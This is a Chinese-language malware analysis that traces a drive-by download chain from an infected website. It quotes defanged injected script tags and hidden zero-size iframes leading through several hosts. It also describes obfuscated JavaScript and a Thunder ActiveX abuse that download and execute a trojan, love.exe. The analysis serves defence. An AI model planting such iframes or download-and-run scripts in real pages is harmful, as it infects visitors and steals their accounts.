有网友说他的电脑打开某个网站后不久,杀毒软件的实时监控被关闭,系统时间被修改,接着安装各种网络游戏和聊天账号的盗号木马。
检查该网站首页代码,发现:
/--- if(parent.window.opener) parent.window.opener.location='hxxp://aa***a.sqr***s11**0.com/'; ……(略)…… <SCRIPT src="hxxp://m***a.china**s*es*e.net/top.js"></SCRIPT> ---/
hxxp://sqr***s1**.s**e*771.com/ 包含代码:
/--- <iframe src="hxxp://m***a.china**s*es*e.net/110.htm" width="0" height="0" frameborder="0"></iframe> ---/
110.htm包含代码:
/--- <iframe src="hxxp://wg***.72***9*72.com/index.htm" width="0" height="0" frameborder="0"></iframe> ---/
index.htm包含代码:
/--- <iframe src="hxxp://union**.0***kis.com/in.htm?7141" width="0" height="0" frameborder="0"></iframe> ---/
in.htm?7141 包含代码:
/--- <script src=css.js></script> <html> <title> test </title> <body> <iframe src=test.htm width=0 height=0></iframe> test </body> </html> ---/ css.js 的内容为用eval()执行自定义函数,经过2次解密,得到JavaScript代码,利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 love.exe,保存到%windir%,文件名由自定义函数: /--- function gn(n){var number = Math.random()*n;return Math.round(number)+'.exe';} ---/
生成,即***.exe(其中*为数字),然后通过 Shell.Application 对象 Q 的 ShellExecute 方法执行命令: %windir%/system32/cmd.exe /c %windir%/***.exe 来运行。
test.htm 包含代码:
/--- <head> <title>test</title> <script src="test.js"></script> </head> <script> exec(); </script> </body> ---/
test.js 的内容未加密,使用ActiveXObject("ThunderServer.webThunder.1")下载 love.exe,保存到 c:/,并使用定时器来运行。
